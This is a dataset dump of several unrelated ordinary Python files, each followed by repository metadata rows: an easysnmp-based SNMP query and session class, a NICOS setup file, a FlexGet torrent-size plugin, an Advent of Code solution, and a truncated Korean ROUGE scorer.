(_, validity, result) = self.query(
oid_to_get,
get=True,
check_reachability=True, context_name=context_name,
check_existence=True)
# If we get no result, then override validity
if bool(result) is False:
validity = False
else:
validity = True
# Return
return validity
def branch_exists(self, oid_to_get, context_name=''):
"""Determine existence of OID on target.
Args:
oid_to_get: OID to get
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
validity: True if exists
"""
# Initialize key variables
validity = False
# Process
(_, validity, results) = self.query(
oid_to_get, get=False,
check_reachability=True,
context_name=context_name,
check_existence=True)
# If we get no result, then override validity
if bool(results) is False:
validity = False
else:
validity = True
# Return
return validity
def walk(
self, oid_to_get, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMPwalk.
Args:
oid_to_get: OID to walk
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
result: Dictionary of tuples (OID, value)
"""
(_, _, result) = self.query(
oid_to_get, get=False,
check_reachability=check_reachability,
check_existence=check_existence,
context_name=context_name)
return result
def get(
self, oid_to_get, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMPget.
Args:
oid_to_get: OID to get
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
Dictionary of tuples (OID, value)
"""
(_, _, _result) = self.query(
oid_to_get, get=True,
check_reachability=check_reachability,
check_existence=check_existence,
context_name=context_name)
if bool(_result) is True:
result = _result
else:
result = None
return result
def query(
self, oid_to_get, get=False, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMP query.
Args:
oid_to_get: OID to walk
get: Flag determining whether to do a GET or WALK
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
Dictionary of tuples (OID, value)
"""
# Initialize variables
_contactable = True
exists = True
results = []
# Create OID string object
oid_string = class_oid.OIDstring(oid_to_get)
# Check if OID is valid
valid_format = oid_string.valid_format()
if valid_format is False:
log_message = ('OID {} has an invalid format'.format(oid_to_get))
log.log2die(51449, log_message)
# Create SNMP session
session = _Session(
self._snmpvariable, context_name=context_name).session
# Create failure log message
try_log_message = (
'Error occurred during SNMPget {}, SNMPwalk {} query against '
'target {} OID {} for context "{}"'
''.format(
get, not get, self._snmp_ip_target,
oid_to_get, context_name))
# Fill the results object by getting OID data
try:
# Get the data
if get is True:
results = [session.get(oid_to_get)]
else:
if self._snmp_version != 1:
# Bulkwalk for SNMPv2 and SNMPv3
results = session.bulkwalk(
oid_to_get, non_repeaters=0, max_repetitions=25)
else:
# Bulkwalk not supported in SNMPv1
results = session.walk(oid_to_get)
# Crash on error, return blank results if doing certain types of
# connectivity checks
except (
exceptions.EasySNMPConnectionError,
exceptions.EasySNMPTimeoutError,
exceptions.EasySNMPUnknownObjectIDError,
exceptions.EasySNMPNoSuchNameError,
exceptions.EasySNMPNoSuchObjectError,
exceptions.EasySNMPNoSuchInstanceError,
exceptions.EasySNMPUndeterminedTypeError) as exception_error:
# Update the error message
try_log_message = ("""\
{}: [{}, {}, {}]""".format(try_log_message, sys.exc_info()[0],
sys.exc_info()[1], sys.exc_info()[2]))
# Process easysnmp errors
(_contactable, exists) = _process_error(
try_log_message, exception_error,
check_reachability, check_existence)
except SystemError as exception_error:
# Update the error message
try_log_message = ("""\
{}: [{}, {}, {}]""".format(try_log_message, sys.exc_info()[0],
sys.exc_info()[1], sys.exc_info()[2]))
# Process easysnmp errors
(_contactable, exists) = _process_error(
try_log_message, exception_error,
check_reachability, check_existence, system_error=True)
except:
log_message = (
'Unexpected error: {}, {}, {}, {}'
''.format(
sys.exc_info()[0],
sys.exc_info()[1],
sys.exc_info()[2],
self._snmp_ip_target))
log.log2die(51029, log_message)
# Format results
values = _convert_results(results)
# Return
return (_contactable, exists, values)
class _Session():
    """Create an easysnmp SNMP session with a target.

    Validates the supplied SNMPVariable, then builds an
    ``easysnmp.Session`` configured for SNMPv1/v2c (community based) or
    SNMPv3 (USM based) access.
    """

    def __init__(self, snmpvariable, context_name=''):
        """Initialize the class.

        Args:
            snmpvariable: SNMPVariable object
            context_name: Name of context

        Returns:
            None

        """
        # Validate the parameters *before* reading attributes from them.
        # (Previously these checks ran after the attribute reads, by which
        # point a blank or wrongly-typed snmpvariable would already have
        # raised an AttributeError instead of the intended log message.)
        # Fail if snmpvariable dictionary is empty
        if bool(snmpvariable) is False:
            log_message = ('SNMP parameters provided are blank. '
                           'Non existent host?')
            log.log2die(51215, log_message)

        # Fail if invalid snmpvariable
        if isinstance(snmpvariable, SNMPVariable) is False:
            log_message = ('Invalid SNMPVariable parameters')
            log.log2die(51216, log_message)

        # Initialize key variables
        self._context_name = context_name
        self._snmp_ip_target = snmpvariable.ip_target
        self._snmp_port = snmpvariable.snmpauth.port
        self._snmp_version = snmpvariable.snmpauth.version
        self._snmp_community = snmpvariable.snmpauth.community
        self._snmp_secname = snmpvariable.snmpauth.secname
        self._snmp_authprotocol = snmpvariable.snmpauth.authprotocol
        self._snmp_authpassword = snmpvariable.snmpauth.authpassword
        self._snmp_privprotocol = snmpvariable.snmpauth.privprotocol
        self._snmp_privpassword = snmpvariable.snmpauth.privpassword

        # Fail if the target has no SNMP version configured
        if self._snmp_version is None:
            log_message = (
                'SNMP version is "None". Non existent host? - {}'
                ''.format(self._snmp_ip_target))
            log.log2die(51223, log_message)

        # Create SNMP session
        self.session = self._session()

    def _session(self):
        """Create an SNMP session for queries.

        Args:
            None

        Returns:
            session: easysnmp.Session object

        """
        # SNMPv1/v2c use a community string; SNMPv3 uses USM credentials.
        if self._snmp_version != 3:
            session = easysnmp.Session(
                community=self._snmp_community,
                hostname=self._snmp_ip_target,
                version=self._snmp_version,
                remote_port=self._snmp_port,
                use_numeric=True,
                context=self._context_name
            )
        else:
            session = easysnmp.Session(
                hostname=self._snmp_ip_target,
                version=self._snmp_version,
                remote_port=self._snmp_port,
                use_numeric=True,
                context=self._context_name,
                security_level=self._security_level(),
                security_username=self._snmp_secname,
                privacy_protocol=self._priv_protocol(),
                privacy_password=self._snmp_privpassword,
                auth_protocol=self._auth_protocol(),
                auth_password=self._snmp_authpassword
            )

        # Return
        return session

    def _security_level(self):
        """Create string for SNMPv3 security level.

        Args:
            None

        Returns:
            result: One of 'authPriv', 'authNoPriv', 'noAuthNoPriv'

        """
        # Privacy requires authentication, hence the nesting.
        if bool(self._snmp_authprotocol) is True:
            if bool(self._snmp_privprotocol) is True:
                result = 'authPriv'
            else:
                result = 'authNoPriv'
        else:
            result = 'noAuthNoPriv'

        # Return
        return result

    def _auth_protocol(self):
        """Get AuthProtocol to use.

        Args:
            None

        Returns:
            result: 'DEFAULT', 'MD5' or 'SHA'

        """
        # Initialize key variables
        protocol = self._snmp_authprotocol

        # Setup AuthProtocol (Default SHA)
        if bool(protocol) is False:
            result = 'DEFAULT'
        else:
            result = 'MD5' if protocol.lower() == 'md5' else 'SHA'

        # Return
        return result

    def _priv_protocol(self):
        """Get privProtocol to use.

        Args:
            None

        Returns:
            result: 'DEFAULT', 'DES' or 'AES'

        """
        # Initialize key variables
        protocol = self._snmp_privprotocol

        # Setup privProtocol (Default AES256)
        if bool(protocol) is False:
            result = 'DEFAULT'
        else:
            result = 'DES' if protocol.lower() == 'des' else 'AES'

        # Return
        return result
def _process_error(
        log_message, exception_error, check_reachability,
        check_existence, system_error=False):
    """Map an SNMP query failure to (contactable, exists) flags.

    Args:
        log_message: Pre-built description of the failed query
        exception_error: Exception raised by the query (kept for
            interface compatibility; all error classes map identically)
        check_reachability: True when the caller is probing connectivity
        check_existence: True when the caller is probing OID existence
        system_error: True for a SystemError rather than an easysnmp error

    Returns:
        Tuple (_contactable, exists); dies via log.log2die when the
        failure was not part of a reachability/existence probe
    """
    # Initialize key variables
    error_name = 'EasySNMPError' if system_error is False else 'SystemError'

    # Existence probe: every easysnmp error class in the original decision
    # tree (unknown-object, no-such-name/object/instance and the fallback)
    # produced the same outcome, so a single return covers them all.
    if check_existence is True:
        if system_error is False:
            return (True, False)

    # Reachability probe: the target could not be contacted.
    if check_reachability is True:
        return (False, False)

    # Die an agonizing death!
    log.log2die(51569, '{}: {}'.format(error_name, log_message))
    return None
def _convert_results(inbound):
    """Convert results from easysnmp.variables.SNMPVariable to DataPoint.

    Args:
        inbound: SNMP query result as list of easysnmp.variables.SNMPVariable

    Returns:
        outbound: DataPoint formatted equivalent
    """
    # SNMP types that map straight through as strings (OBJECTID included:
    # the value is deliberately kept as-is, not re-encoded to bytes).
    string_types = {'OCTETSTR', 'OPAQUE', 'BITS', 'IPADDR', 'NETADDR',
                    'OBJECTID'}
    # SNMP types carrying no data (missing OID / end of MIB / null).
    empty_types = {'NOSUCHOBJECT', 'NOSUCHINSTANCE', 'ENDOFMIBVIEW', 'NULL'}

    outbound = []
    for entry in inbound:
        snmp_type = entry.snmp_type.upper()

        if snmp_type in string_types:
            converted, data_type = entry.value, DATA_STRING
        elif snmp_type in empty_types:
            converted, data_type = None, DATA_NONE
        elif snmp_type == 'COUNTER':
            converted, data_type = int(entry.value), DATA_COUNT
        elif snmp_type == 'COUNTER64':
            converted, data_type = int(entry.value), DATA_COUNT64
        else:
            # Everything else (Integer, Integer32, Gauge32, Unsigned32,
            # TimeTicks, ...) becomes a plain integer.
            converted, data_type = int(entry.value), DATA_INT

        # Key each DataPoint by "<oid>.<index>"
        key = '{}.{}'.format(entry.oid, entry.oid_index)
        outbound.append(DataPoint(key, converted, data_type=data_type))

    # Return
    return outbound
| 31.314642 | 78 | 0.569389 | 15,086 | 0.750398 | 0 | 0 | 0 | 0 | 0 | 0 | 7,377 | 0.366942 |
0dd15e9fbd8b5095490c20bbe408b720a1df4284 | 76 | py | Python | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos_mlz/resi/setups/resi.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Resi instrument setup'
# NICOS setup metadata for the RESI instrument: a 'basic' setup that pulls
# in the devices declared by the 'base' setup.
group = 'basic'
includes = ['base']
| 12.666667 | 37 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.473684 |
0dd1930770aea04bae379563241478aca2d4c7fe | 643 | py | Python | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | flexget/plugins/metainfo/torrent_size.py | Crupuk/Flexget | 0ede246fd4b90e3cd75120ba13746187e11968d2 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget.plugin import priority, register_plugin
log = logging.getLogger('torrent_size')
class TorrentSize(object):
"""
Provides file size information when dealing with torrents
"""
@priority(200)
def on_task_modify(self, task):
for entry in task.entries:
if 'torrent' in entry:
size = entry['torrent'].size / 1024 / 1024
log.debug('%s size: %s MB' % (entry['title'], size))
entry['content_size'] = size
register_plugin(TorrentSize, 'torrent_size', builtin=True)
| 27.956522 | 68 | 0.656299 | 403 | 0.62675 | 0 | 0 | 293 | 0.455677 | 0 | 0 | 156 | 0.242613 |
0dd2555afdd3a6cef51e80f367899168ecaad20e | 724 | py | Python | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | day23.py | ednl/aoc2015 | 0cce9ca34c4218f063b1c6eed92477b47558cf5b | [
"MIT"
] | null | null | null | import re
cmd = re.compile(r'^(\w+) (\w)?(?:, )?((?:\+|-)\d+)?$')
with open('input23.txt') as f:
# Subtract 1 from jump (offset) to enable ip++ for every instruction
mem = [(i, r, j if j is None else int(j) - 1) for s in f for i, r, j in [cmd.match(s.strip()).groups()]]
def run(a: int) -> int:
reg = {'a': a, 'b': 0}
ip = 0
while ip >= 0 and ip < len(mem):
i, r, j = mem[ip]
if i == 'inc':
reg[r] += 1
elif i == 'hlf':
reg[r] //= 2
elif i == 'tpl':
reg[r] *= 3
elif i == 'jmp' or (i == 'jie' and reg[r] % 2 == 0) or (i == 'jio' and reg[r] == 1):
ip += j
ip += 1
return reg['b']
print(run(0), run(1))
| 28.96 | 108 | 0.426796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 157 | 0.216851 |
0dd32e9ca2c7ce0add00ea94a0758f176b038de9 | 27,038 | py | Python | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | 8 | 2021-05-16T05:40:29.000Z | 2022-03-14T08:32:54.000Z | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | null | null | null | src/summarization/metric/rouge_metric.py | youngerous/kobart-voice-summarization | bf48edea602c0661d638f0ed6f4a35c2ced4009f | [
"Apache-2.0"
] | 3 | 2021-08-09T08:06:24.000Z | 2021-11-29T05:04:56.000Z | """
Ref: https://dacon.io/competitions/official/235673/talkboard/401911?page=1&dtype=recent
"""
import os
import re
import platform
import itertools
import collections
import pkg_resources # pip install py-rouge
from io import open
# Platform-dependent Mecab tokenizer import: Windows uses the eunjeon
# wheel, other systems (e.g. Ubuntu) use konlpy's Mecab wrapper.
if platform.system() == "Windows":
    try:
        from eunjeon import Mecab
    except ImportError:
        # Narrowed from a bare ``except``: only a missing package should be
        # reported here; any other failure must propagate.
        print("please install eunjeon module")
else:  # non-Windows (e.g. Ubuntu)
    from konlpy.tag import Mecab
class Rouge:
    """Compute ROUGE-N, ROUGE-L and ROUGE-W summarization metrics.

    Port of py-rouge adapted for Korean text: optional Mecab tokenization
    and a character filter that keeps Hangul syllables alongside ASCII
    alphanumerics.  Scores over multiple references can be averaged
    (``apply_avg``), taken from the best reference (``apply_best``), or
    returned per sample.
    """

    DEFAULT_METRICS = {"rouge-n"}
    DEFAULT_N = 1
    STATS = ["f", "p", "r"]
    AVAILABLE_METRICS = {"rouge-n", "rouge-l", "rouge-w"}
    AVAILABLE_LENGTH_LIMIT_TYPES = {"words", "bytes"}
    # Everything except ASCII alphanumerics and Hangul syllables is noise.
    REMOVE_CHAR_PATTERN = re.compile("[^A-Za-z0-9가-힣]")

    def __init__(
        self,
        metrics=None,
        max_n=None,
        limit_length=True,
        length_limit=1000,
        length_limit_type="words",
        apply_avg=True,
        apply_best=False,
        use_tokenizer=True,
        alpha=0.5,
        weight_factor=1.0,
    ):
        """Initialize the scorer.

        Args:
            metrics: Metric names from AVAILABLE_METRICS (default rouge-n)
            max_n: Largest n for rouge-n; expands to rouge-1..rouge-max_n
            limit_length: Whether to truncate summaries before scoring
            length_limit: Truncation threshold (0 disables truncation)
            length_limit_type: 'words' or 'bytes'
            apply_avg: Average scores over multiple references
            apply_best: Keep the best-scoring reference instead
            use_tokenizer: Tokenize with Mecab (otherwise raw text is used)
            alpha: F-score weighting between precision (1-alpha) and recall
            weight_factor: ROUGE-W weighting exponent (> 0)

        Raises:
            ValueError: On unknown metric / length-limit type, or a
                non-positive weight factor
        """
        # Fix: the default must be a *list* copy.  Using the class-level
        # set directly crashed later on .index()/del when max_n was given,
        # and would have mutated DEFAULT_METRICS for every instance.
        self.metrics = metrics[:] if metrics is not None else list(
            Rouge.DEFAULT_METRICS)
        for m in self.metrics:
            if m not in Rouge.AVAILABLE_METRICS:
                raise ValueError("Unknown metric '{}'".format(m))

        self.max_n = max_n if "rouge-n" in self.metrics else None
        # Add all rouge-n metrics
        if self.max_n is not None:
            index_rouge_n = self.metrics.index("rouge-n")
            del self.metrics[index_rouge_n]
            self.metrics += ["rouge-{}".format(n) for n in range(1, self.max_n + 1)]
        self.metrics = set(self.metrics)

        self.limit_length = limit_length
        if self.limit_length:
            if length_limit_type not in Rouge.AVAILABLE_LENGTH_LIMIT_TYPES:
                raise ValueError(
                    "Unknown length_limit_type '{}'".format(length_limit_type)
                )

        self.length_limit = length_limit
        if self.length_limit == 0:
            self.limit_length = False
        self.length_limit_type = length_limit_type
        self.use_tokenizer = use_tokenizer
        if use_tokenizer:
            self.tokenizer = Mecab()

        self.apply_avg = apply_avg
        self.apply_best = apply_best
        self.alpha = alpha
        self.weight_factor = weight_factor
        if self.weight_factor <= 0:
            raise ValueError("ROUGE-W weight factor must greater than 0.")

    def tokenize_text(self, text):
        """Return Mecab morphemes, or the raw text when tokenization is off."""
        if self.use_tokenizer:
            return self.tokenizer.morphs(text)
        else:
            return text

    @staticmethod
    def split_into_sentences(text):
        """Split a summary into sentences; the format is one per line."""
        return text.split("\n")

    @staticmethod
    def _get_ngrams(n, text):
        """Count the n-grams of token list *text* into a defaultdict."""
        ngram_set = collections.defaultdict(int)
        max_index_ngram_start = len(text) - n
        for i in range(max_index_ngram_start + 1):
            ngram_set[tuple(text[i : i + n])] += 1
        return ngram_set

    @staticmethod
    def _split_into_words(sentences):
        """Flatten a list of sentences into one whitespace token list."""
        return list(itertools.chain(*[_.split() for _ in sentences]))

    @staticmethod
    def _get_word_ngrams_and_length(n, sentences):
        """Return (ngram counts, tokens, number of n-grams) for sentences."""
        assert len(sentences) > 0
        assert n > 0

        tokens = Rouge._split_into_words(sentences)
        return Rouge._get_ngrams(n, tokens), tokens, len(tokens) - (n - 1)

    @staticmethod
    def _get_unigrams(sentences):
        """Return (unigram counts, total token count) for sentences."""
        assert len(sentences) > 0

        tokens = Rouge._split_into_words(sentences)
        unigram_set = collections.defaultdict(int)
        for token in tokens:
            unigram_set[token] += 1
        return unigram_set, len(tokens)

    @staticmethod
    def _compute_p_r_f_score(
        evaluated_count,
        reference_count,
        overlapping_count,
        alpha=0.5,
        weight_factor=1.0,
    ):
        """Compute precision/recall/F1 from raw counts.

        A weight_factor != 1.0 (ROUGE-W) undoes the weighting exponent on
        precision and recall before the F score is formed.
        """
        precision = (
            0.0 if evaluated_count == 0 else overlapping_count / float(evaluated_count)
        )
        if weight_factor != 1.0:
            precision = precision ** (1.0 / weight_factor)
        recall = (
            0.0 if reference_count == 0 else overlapping_count / float(reference_count)
        )
        if weight_factor != 1.0:
            recall = recall ** (1.0 / weight_factor)
        f1_score = Rouge._compute_f_score(precision, recall, alpha)
        return {"f": f1_score, "p": precision, "r": recall}

    @staticmethod
    def _compute_f_score(precision, recall, alpha=0.5):
        """Alpha-weighted harmonic mean of precision and recall."""
        return (
            0.0
            if (recall == 0.0 or precision == 0.0)
            else precision * recall / ((1 - alpha) * precision + alpha * recall)
        )

    @staticmethod
    def _compute_ngrams(evaluated_sentences, reference_sentences, n):
        """Return (evaluated, reference, overlapping) n-gram counts."""
        if len(evaluated_sentences) <= 0 or len(reference_sentences) <= 0:
            raise ValueError("Collections must contain at least 1 sentence.")

        evaluated_ngrams, _, evaluated_count = Rouge._get_word_ngrams_and_length(
            n, evaluated_sentences
        )
        reference_ngrams, _, reference_count = Rouge._get_word_ngrams_and_length(
            n, reference_sentences
        )

        # Gets the overlapping ngrams between evaluated and reference
        overlapping_ngrams = set(evaluated_ngrams.keys()).intersection(
            set(reference_ngrams.keys())
        )
        overlapping_count = 0
        for ngram in overlapping_ngrams:
            overlapping_count += min(evaluated_ngrams[ngram], reference_ngrams[ngram])

        return evaluated_count, reference_count, overlapping_count

    @staticmethod
    def _compute_ngrams_lcs(
        evaluated_sentences, reference_sentences, weight_factor=1.0
    ):
        """Return LCS-based (evaluated, reference, overlapping) counts.

        Uses the plain LCS for ROUGE-L and the weighted LCS when
        weight_factor != 1.0 (ROUGE-W).
        """

        def _lcs(x, y):
            # Classic dynamic-programming LCS with direction markers.
            m = len(x)
            n = len(y)
            vals = collections.defaultdict(int)
            dirs = collections.defaultdict(int)
            for i in range(1, m + 1):
                for j in range(1, n + 1):
                    if x[i - 1] == y[j - 1]:
                        vals[i, j] = vals[i - 1, j - 1] + 1
                        dirs[i, j] = "|"
                    elif vals[i - 1, j] >= vals[i, j - 1]:
                        vals[i, j] = vals[i - 1, j]
                        dirs[i, j] = "^"
                    else:
                        vals[i, j] = vals[i, j - 1]
                        dirs[i, j] = "<"
            return vals, dirs

        def _wlcs(x, y, weight_factor):
            # Weighted LCS: consecutive matches earn a super-linear bonus.
            m = len(x)
            n = len(y)
            vals = collections.defaultdict(float)
            dirs = collections.defaultdict(int)
            lengths = collections.defaultdict(int)
            for i in range(1, m + 1):
                for j in range(1, n + 1):
                    if x[i - 1] == y[j - 1]:
                        length_tmp = lengths[i - 1, j - 1]
                        vals[i, j] = (
                            vals[i - 1, j - 1]
                            + (length_tmp + 1) ** weight_factor
                            - length_tmp ** weight_factor
                        )
                        dirs[i, j] = "|"
                        lengths[i, j] = length_tmp + 1
                    elif vals[i - 1, j] >= vals[i, j - 1]:
                        vals[i, j] = vals[i - 1, j]
                        dirs[i, j] = "^"
                        lengths[i, j] = 0
                    else:
                        vals[i, j] = vals[i, j - 1]
                        dirs[i, j] = "<"
                        lengths[i, j] = 0
            return vals, dirs

        def _mark_lcs(mask, dirs, m, n):
            # Walk the direction table backwards, flagging matched tokens.
            while m != 0 and n != 0:
                if dirs[m, n] == "|":
                    m -= 1
                    n -= 1
                    mask[m] = 1
                elif dirs[m, n] == "^":
                    m -= 1
                elif dirs[m, n] == "<":
                    n -= 1
                else:
                    raise UnboundLocalError("Illegal move")
            return mask

        if len(evaluated_sentences) <= 0 or len(reference_sentences) <= 0:
            raise ValueError("Collections must contain at least 1 sentence.")

        evaluated_unigrams_dict, evaluated_count = Rouge._get_unigrams(
            evaluated_sentences
        )
        reference_unigrams_dict, reference_count = Rouge._get_unigrams(
            reference_sentences
        )

        # Has to use weight factor for WLCS
        use_WLCS = weight_factor != 1.0
        if use_WLCS:
            evaluated_count = evaluated_count ** weight_factor
            reference_count = 0

        overlapping_count = 0.0
        for reference_sentence in reference_sentences:
            reference_sentence_tokens = reference_sentence.split()
            if use_WLCS:
                reference_count += len(reference_sentence_tokens) ** weight_factor
            hit_mask = [0 for _ in range(len(reference_sentence_tokens))]
            for evaluated_sentence in evaluated_sentences:
                evaluated_sentence_tokens = evaluated_sentence.split()

                if use_WLCS:
                    _, lcs_dirs = _wlcs(
                        reference_sentence_tokens,
                        evaluated_sentence_tokens,
                        weight_factor,
                    )
                else:
                    _, lcs_dirs = _lcs(
                        reference_sentence_tokens, evaluated_sentence_tokens
                    )
                _mark_lcs(
                    hit_mask,
                    lcs_dirs,
                    len(reference_sentence_tokens),
                    len(evaluated_sentence_tokens),
                )

            overlapping_count_length = 0
            for ref_token_id, val in enumerate(hit_mask):
                if val == 1:
                    token = reference_sentence_tokens[ref_token_id]
                    if (
                        evaluated_unigrams_dict[token] > 0
                        and reference_unigrams_dict[token] > 0
                    ):
                        evaluated_unigrams_dict[token] -= 1
                        # Fix: decrement by token, not by integer index.
                        # Indexing with ref_token_id only created spurious
                        # int keys in the defaultdict, so a token's budget
                        # was never consumed and overlaps could be double
                        # counted across evaluated sentences.
                        reference_unigrams_dict[token] -= 1

                        if use_WLCS:
                            overlapping_count_length += 1
                            if (
                                ref_token_id + 1 < len(hit_mask)
                                and hit_mask[ref_token_id + 1] == 0
                            ) or ref_token_id + 1 == len(hit_mask):
                                overlapping_count += (
                                    overlapping_count_length ** weight_factor
                                )
                                overlapping_count_length = 0
                        else:
                            overlapping_count += 1

        if use_WLCS:
            reference_count = reference_count ** weight_factor

        return evaluated_count, reference_count, overlapping_count

    def get_scores(self, hypothesis, references):
        """Score hypothesis summaries against reference summaries.

        Args:
            hypothesis: A summary string or a list of summary strings
            references: Matching reference string(s); each element may be
                a list when a sample has multiple references

        Returns:
            dict mapping metric name -> stats ('f'/'p'/'r'), aggregated
            according to apply_avg / apply_best
        """
        if isinstance(hypothesis, str):
            hypothesis, references = [hypothesis], [references]

        if type(hypothesis) != type(references):
            raise ValueError("'hyps' and 'refs' are not of the same type")
        if len(hypothesis) != len(references):
            raise ValueError("'hyps' and 'refs' do not have the same length")

        scores = {}
        has_rouge_n_metric = (
            len([metric for metric in self.metrics if metric.split("-")[-1].isdigit()])
            > 0
        )
        if has_rouge_n_metric:
            scores.update(self._get_scores_rouge_n(hypothesis, references))

        has_rouge_l_metric = (
            len(
                [
                    metric
                    for metric in self.metrics
                    if metric.split("-")[-1].lower() == "l"
                ]
            )
            > 0
        )
        if has_rouge_l_metric:
            scores.update(self._get_scores_rouge_l_or_w(hypothesis, references, False))

        has_rouge_w_metric = (
            len(
                [
                    metric
                    for metric in self.metrics
                    if metric.split("-")[-1].lower() == "w"
                ]
            )
            > 0
        )
        if has_rouge_w_metric:
            scores.update(self._get_scores_rouge_l_or_w(hypothesis, references, True))

        return scores

    def _get_scores_rouge_n(self, all_hypothesis, all_references):
        """Compute all requested rouge-n scores (n from the metric names)."""
        metrics = [metric for metric in self.metrics if metric.split("-")[-1].isdigit()]

        if self.apply_avg or self.apply_best:
            scores = {metric: {stat: 0.0 for stat in Rouge.STATS} for metric in metrics}
        else:
            scores = {
                metric: [
                    {stat: [] for stat in Rouge.STATS}
                    for _ in range(len(all_hypothesis))
                ]
                for metric in metrics
            }

        for sample_id, (hypothesis, references) in enumerate(
            zip(all_hypothesis, all_references)
        ):
            assert isinstance(hypothesis, str)
            has_multiple_references = False
            if isinstance(references, list):
                has_multiple_references = len(references) > 1
                if not has_multiple_references:
                    references = references[0]

            # Prepare hypothesis and reference(s)
            hypothesis = self._preprocess_summary_as_a_whole(hypothesis)
            references = (
                [
                    self._preprocess_summary_as_a_whole(reference)
                    for reference in references
                ]
                if has_multiple_references
                else [self._preprocess_summary_as_a_whole(references)]
            )

            # Compute scores
            for metric in metrics:
                suffix = metric.split("-")[-1]
                n = int(suffix)

                # Aggregate
                if self.apply_avg:
                    # average model
                    total_hypothesis_ngrams_count = 0
                    total_reference_ngrams_count = 0
                    total_ngrams_overlapping_count = 0

                    for reference in references:
                        (
                            hypothesis_count,
                            reference_count,
                            overlapping_ngrams,
                        ) = Rouge._compute_ngrams(hypothesis, reference, n)
                        total_hypothesis_ngrams_count += hypothesis_count
                        total_reference_ngrams_count += reference_count
                        total_ngrams_overlapping_count += overlapping_ngrams

                    score = Rouge._compute_p_r_f_score(
                        total_hypothesis_ngrams_count,
                        total_reference_ngrams_count,
                        total_ngrams_overlapping_count,
                        self.alpha,
                    )

                    for stat in Rouge.STATS:
                        scores[metric][stat] += score[stat]
                else:
                    # Best model
                    if self.apply_best:
                        best_current_score = None
                        for reference in references:
                            (
                                hypothesis_count,
                                reference_count,
                                overlapping_ngrams,
                            ) = Rouge._compute_ngrams(hypothesis, reference, n)
                            score = Rouge._compute_p_r_f_score(
                                hypothesis_count,
                                reference_count,
                                overlapping_ngrams,
                                self.alpha,
                            )
                            if (
                                best_current_score is None
                                or score["r"] > best_current_score["r"]
                            ):
                                best_current_score = score

                        for stat in Rouge.STATS:
                            scores[metric][stat] += best_current_score[stat]
                    # Keep all
                    else:
                        for reference in references:
                            (
                                hypothesis_count,
                                reference_count,
                                overlapping_ngrams,
                            ) = Rouge._compute_ngrams(hypothesis, reference, n)
                            score = Rouge._compute_p_r_f_score(
                                hypothesis_count,
                                reference_count,
                                overlapping_ngrams,
                                self.alpha,
                            )
                            for stat in Rouge.STATS:
                                scores[metric][sample_id][stat].append(score[stat])

        # Compute the final score as the average (or max) across samples
        if (self.apply_avg or self.apply_best) and len(all_hypothesis) > 1:
            for metric in metrics:
                for stat in Rouge.STATS:
                    scores[metric][stat] /= len(all_hypothesis)

        return scores

    def _get_scores_rouge_l_or_w(self, all_hypothesis, all_references, use_w=False):
        """Compute rouge-l (use_w False) or rouge-w (use_w True) scores."""
        metric = "rouge-w" if use_w else "rouge-l"
        if self.apply_avg or self.apply_best:
            scores = {metric: {stat: 0.0 for stat in Rouge.STATS}}
        else:
            scores = {
                metric: [
                    {stat: [] for stat in Rouge.STATS}
                    for _ in range(len(all_hypothesis))
                ]
            }

        for sample_id, (hypothesis_sentences, references_sentences) in enumerate(
            zip(all_hypothesis, all_references)
        ):
            assert isinstance(hypothesis_sentences, str)
            has_multiple_references = False
            if isinstance(references_sentences, list):
                has_multiple_references = len(references_sentences) > 1
                if not has_multiple_references:
                    references_sentences = references_sentences[0]

            # Prepare hypothesis and reference(s)
            hypothesis_sentences = self._preprocess_summary_per_sentence(
                hypothesis_sentences
            )
            references_sentences = (
                [
                    self._preprocess_summary_per_sentence(reference)
                    for reference in references_sentences
                ]
                if has_multiple_references
                else [self._preprocess_summary_per_sentence(references_sentences)]
            )

            # Compute scores
            # Aggregate
